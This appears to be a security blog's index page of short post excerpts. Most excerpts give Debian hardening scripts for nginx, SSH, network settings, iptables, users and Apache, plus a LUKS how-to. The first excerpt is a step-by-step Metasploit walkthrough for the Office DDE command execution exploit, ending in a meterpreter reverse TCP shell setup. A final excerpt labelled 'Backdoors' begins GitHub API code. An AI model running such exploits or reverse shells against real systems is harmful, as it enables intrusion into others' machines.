Exploits, Office

Exploit Microsoft Office DDE Command Execution Vulnerability

Download module
wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/fb3410c4f2e47a003fd9910ce78f0fc72e513674/modules/exploits/windows/script/dde_delivery.rb
Move module into framework
mv dde_delivery.rb /usr/share/metasploit-framework/modules/exploits/windows/
Open Metasploit and load exploit
msfconsole
reload_all
use exploit/windows/dde_delivery
Set the server host
set SRVHOST 192.168.1.10
Choose payload and run it
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.10
set LPORT 443
exploit
…

Hardening, nginx

Nginx Hardening & Security Script

Tested on Debian 9.x https://github.com/maldevel/blue-team
Hide nginx version
sed -i "s/# server_tokens off;/server_tokens off;/g" /etc/nginx/nginx.conf
Remove ETags
sed -i 's/server_tokens off;/server_tokens off;\netag off;/' /etc/nginx/nginx.conf
Remove default page
echo "" > /var/www/html/index.html
Use strong cipher suites
sed -i "s/ssl_prefer_server_ciphers on;/ssl_prefer_server_ciphers on;\nssl_ciphers …

Hardening, OpenSSH

SSH Hardening & Security Script

Tested on Debian 9.x https://github.com/maldevel/blue-team
Set /etc/ssh/sshd_config ownership and access permissions
chown root:root /etc/ssh/sshd_config
chmod 600 /etc/ssh/sshd_config
Change Port
sed -i "s/#Port 22/Port 62111/g" /etc/ssh/sshd_config
Use Protocol 2
echo "Protocol 2" >> /etc/ssh/sshd_config
Set SSH LogLevel to INFO
sed -i "/LogLevel.*/s/^#//g" …

Hardening, Network

Network Hardening & Security Script

Tested on Debian 9.x https://github.com/maldevel/blue-team
Disable IP forwarding
sed -i "s/#net.ipv4.ip_forward=1/net.ipv4.ip_forward=0/" /etc/sysctl.conf
sysctl -w net.ipv4.ip_forward=0
Disable packet redirect sending
sed -i "/net.ipv4.conf.all.send_redirects.*/s/^#//g" /etc/sysctl.conf
echo "net.ipv4.conf.default.send_redirects=0" >> /etc/sysctl.conf
sysctl -w net.ipv4.conf.all.send_redirects=0
sysctl -w net.ipv4.conf.default.send_redirects=0
Disable source routed …

Hardening, IPTables

Basic iptables security script

Tested on Debian 9.x https://github.com/maldevel/blue-team
Install iptables
apt -y install iptables
Install iptables-persistent
apt -y install iptables-persistent
systemctl enable netfilter-persistent
Flush/Delete firewall rules
iptables -F
iptables -X
iptables -Z
Block null packets (DoS)
iptables -A INPUT -p tcp --tcp-flags ALL NONE …

Hardening, Linux

Linux Users Hardening & Security Script

Tested on Debian 9.x https://github.com/maldevel/blue-team
Set Maximum number of days a password may be used
sed -i "s/^PASS_MAX_DAYS.*/PASS_MAX_DAYS 90/" /etc/login.defs
Set Minimum number of days allowed between password changes to 5
sed -i "s/^PASS_MIN_DAYS.*/PASS_MIN_DAYS 5/" /etc/login.defs
Set Number of days warning given before a password expires
sed …

Apache, Hardening

Apache Web Server Hardening & Security Script

Tested on Debian 9.x https://github.com/maldevel/blue-team
Become root
sudo su -
Hide Apache2 version
echo "ServerSignature Off" >> /etc/apache2/apache2.conf
echo "ServerTokens Prod" >> /etc/apache2/apache2.conf
Remove ETags
echo "FileETag None" >> /etc/apache2/apache2.conf
Disable Directory Browsing
a2dismod -f autoindex
Remove default …

Encryption, LUKS

Create an encrypted file container in Linux

Installations
sudo apt-get install cryptsetup
Create an empty file with the size of your container (e.g. 100MB)
fallocate -l 100M mycontainer.img
or
dd if=/dev/urandom of=mycontainer.img bs=1M count=100
Using a keyfile
dd if=/dev/urandom of=mykey.key bs=1024 count=1
Encrypting disk image file
sudo cryptsetup …

Backdoors, Git, Github, Python

Github APIv3 python wrapper

pygithub3 is a Github APIv3 python wrapper.
Search in commit messages
from pygithub3 import Github

gh = Github(token=access_token, user=username, repo=myrepo)
commits = gh.repos.commits.list().all()
for c in commits:
    if 'blahblah' == c.commit.message:
        pass
…